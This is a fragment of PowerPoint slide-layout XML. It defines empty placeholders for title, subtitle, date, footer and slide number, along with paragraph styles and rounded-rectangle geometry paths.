                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E673FE98-88B7-6C44-B407-E68DDC364F01}"/>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6C37B815-FFFF-9A47-97E2-0F473B9BBBF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7404FA86-30AC-B64A-B6BB-2885DAFEB1ED}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EE77903-DFCC-264A-958B-F7EC8175D4CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{BC09DB04-A91B-9C42-9330-3330098648CA}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332969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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A8D0B59-C665-E04F-BA30-CAACF3E4D944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="913596" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{444F7391-085F-6A40-973D-D946089C759B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="913596" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{C92A2828-BE14-A645-A80D-375E200F3CF2}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A196013E-5F25-464C-869A-37FA68DC2803}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="912813" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{F47B90ED-C817-C147-B469-0A0BB70FA336}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93763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4" name="bk object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53798879-01D6-D04A-AA50-2672BE160F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="284163" y="465138"/>
            <a:ext cx="9234487" cy="36845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5963">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="715963">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="715963">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="715963">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="715963">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="715963" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="715963" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="715963" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="715963"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sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="bk object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60532B01-5404-1644-90E9-FF8831EDF0A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="342900" y="3902075"/>
            <a:ext cx="4878388" cy="352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5963">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="715963">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="715963">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="715963">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="715963">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="715963" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="715963" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="715963" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="715963"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sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="bk object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B704AD2-13D2-3F4A-B8E6-B0FDF52AEF30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="382588" y="3922713"/>
            <a:ext cx="4799012" cy="271462"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 6204584"/>
              <a:gd name="T1" fmla="*/ 1543 h 342264"/>
              <a:gd name="T2" fmla="*/ 0 w 6204584"/>
              <a:gd name="T3" fmla="*/ 544 h 342264"/>
              <a:gd name="T4" fmla="*/ 25 w 6204584"/>
              <a:gd name="T5" fmla="*/ 332 h 342264"/>
              <a:gd name="T6" fmla="*/ 91 w 6204584"/>
              <a:gd name="T7" fmla="*/ 159 h 342264"/>
              <a:gd name="T8" fmla="*/ 191 w 6204584"/>
              <a:gd name="T9" fmla="*/ 43 h 342264"/>
              <a:gd name="T10" fmla="*/ 313 w 6204584"/>
              <a:gd name="T11" fmla="*/ 0 h 342264"/>
              <a:gd name="T12" fmla="*/ 21481 w 6204584"/>
              <a:gd name="T13" fmla="*/ 0 h 342264"/>
              <a:gd name="T14" fmla="*/ 21604 w 6204584"/>
              <a:gd name="T15" fmla="*/ 43 h 342264"/>
              <a:gd name="T16" fmla="*/ 21703 w 6204584"/>
              <a:gd name="T17" fmla="*/ 159 h 342264"/>
              <a:gd name="T18" fmla="*/ 21771 w 6204584"/>
              <a:gd name="T19" fmla="*/ 332 h 342264"/>
              <a:gd name="T20" fmla="*/ 21795 w 6204584"/>
              <a:gd name="T21" fmla="*/ 544 h 342264"/>
              <a:gd name="T22" fmla="*/ 21795 w 6204584"/>
              <a:gd name="T23" fmla="*/ 1543 h 342264"/>
              <a:gd name="T24" fmla="*/ 21771 w 6204584"/>
              <a:gd name="T25" fmla="*/ 1754 h 342264"/>
              <a:gd name="T26" fmla="*/ 21703 w 6204584"/>
              <a:gd name="T27" fmla="*/ 1927 h 342264"/>
              <a:gd name="T28" fmla="*/ 21604 w 6204584"/>
              <a:gd name="T29" fmla="*/ 2044 h 342264"/>
              <a:gd name="T30" fmla="*/ 21481 w 6204584"/>
              <a:gd name="T31" fmla="*/ 2088 h 342264"/>
              <a:gd name="T32" fmla="*/ 313 w 6204584"/>
              <a:gd name="T33" fmla="*/ 2088 h 342264"/>
              <a:gd name="T34" fmla="*/ 191 w 6204584"/>
              <a:gd name="T35" fmla="*/ 2044 h 342264"/>
              <a:gd name="T36" fmla="*/ 91 w 6204584"/>
              <a:gd name="T37" fmla="*/ 1927 h 342264"/>
              <a:gd name="T38" fmla="*/ 25 w 6204584"/>
              <a:gd name="T39" fmla="*/ 1754 h 342264"/>
              <a:gd name="T40" fmla="*/ 0 w 6204584"/>
              <a:gd name="T41" fmla="*/ 1543 h 3422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04584" h="342264">
                <a:moveTo>
                  <a:pt x="0" y="252710"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="89156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7006" y="54452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26113" y="26113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54452" y="7006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89156" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6115177" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149881" y="7006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6178224" y="26113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6197335" y="54452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6204343" y="89156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6204343" y="252710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6197335" y="287414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6178224" y="315753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149881" y="334861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6115177" y="341867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89156" y="341867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54452" y="334861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26113" y="315753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7006" y="287414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="252710"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25400">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bk object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00BB849C-A3D4-B84A-A45E-E6704C42DAD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="357188" y="2644775"/>
            <a:ext cx="2219325" cy="352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5963">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="715963">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="715963">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="715963">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="715963">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="715963" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="715963" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="715963" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="715963"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sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="bk object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23F5DB4B-8F32-2F47-B635-593B02D92C65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="396875" y="2663825"/>
            <a:ext cx="2139950" cy="273050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2767329"/>
              <a:gd name="T1" fmla="*/ 1754 h 342264"/>
              <a:gd name="T2" fmla="*/ 0 w 2767329"/>
              <a:gd name="T3" fmla="*/ 618 h 342264"/>
              <a:gd name="T4" fmla="*/ 25 w 2767329"/>
              <a:gd name="T5" fmla="*/ 378 h 342264"/>
              <a:gd name="T6" fmla="*/ 91 w 2767329"/>
              <a:gd name="T7" fmla="*/ 181 h 342264"/>
              <a:gd name="T8" fmla="*/ 190 w 2767329"/>
              <a:gd name="T9" fmla="*/ 49 h 342264"/>
              <a:gd name="T10" fmla="*/ 312 w 2767329"/>
              <a:gd name="T11" fmla="*/ 0 h 342264"/>
              <a:gd name="T12" fmla="*/ 9361 w 2767329"/>
              <a:gd name="T13" fmla="*/ 0 h 342264"/>
              <a:gd name="T14" fmla="*/ 9482 w 2767329"/>
              <a:gd name="T15" fmla="*/ 49 h 342264"/>
              <a:gd name="T16" fmla="*/ 9581 w 2767329"/>
              <a:gd name="T17" fmla="*/ 181 h 342264"/>
              <a:gd name="T18" fmla="*/ 9648 w 2767329"/>
              <a:gd name="T19" fmla="*/ 378 h 342264"/>
              <a:gd name="T20" fmla="*/ 9673 w 2767329"/>
              <a:gd name="T21" fmla="*/ 618 h 342264"/>
              <a:gd name="T22" fmla="*/ 9673 w 2767329"/>
              <a:gd name="T23" fmla="*/ 1754 h 342264"/>
              <a:gd name="T24" fmla="*/ 9648 w 2767329"/>
              <a:gd name="T25" fmla="*/ 1994 h 342264"/>
              <a:gd name="T26" fmla="*/ 9581 w 2767329"/>
              <a:gd name="T27" fmla="*/ 2191 h 342264"/>
              <a:gd name="T28" fmla="*/ 9482 w 2767329"/>
              <a:gd name="T29" fmla="*/ 2324 h 342264"/>
              <a:gd name="T30" fmla="*/ 9361 w 2767329"/>
              <a:gd name="T31" fmla="*/ 2373 h 342264"/>
              <a:gd name="T32" fmla="*/ 312 w 2767329"/>
              <a:gd name="T33" fmla="*/ 2373 h 342264"/>
              <a:gd name="T34" fmla="*/ 190 w 2767329"/>
              <a:gd name="T35" fmla="*/ 2324 h 342264"/>
              <a:gd name="T36" fmla="*/ 91 w 2767329"/>
              <a:gd name="T37" fmla="*/ 2191 h 342264"/>
              <a:gd name="T38" fmla="*/ 25 w 2767329"/>
              <a:gd name="T39" fmla="*/ 1994 h 342264"/>
              <a:gd name="T40" fmla="*/ 0 w 2767329"/>
              <a:gd name="T41" fmla="*/ 1754 h 3422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67329" h="342264">
                <a:moveTo>
                  <a:pt x="0" y="252710"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="89156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7006" y="54452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26113" y="26113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54452" y="7006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89156" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2677731" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2712434" y="7006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2740772" y="26113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2759879" y="54452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2766885" y="89156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2766885" y="252710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2759879" y="287414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2740772" y="315753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2712434" y="334861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2677731" y="341867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89156" y="341867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54452" y="334861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26113" y="315753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7006" y="287414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="252710"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25399">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 name="Holder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712964" y="50602"/>
            <a:ext cx="2632472" cy="441467"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2800" b="0" i="0" u="heavy">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508760" y="4352544"/>
            <a:ext cx="7040880" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE79B778-7EEB-1748-8B9D-050BADD49FC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419475" y="7227888"/>
            <a:ext cx="3219450" cy="282575"/>
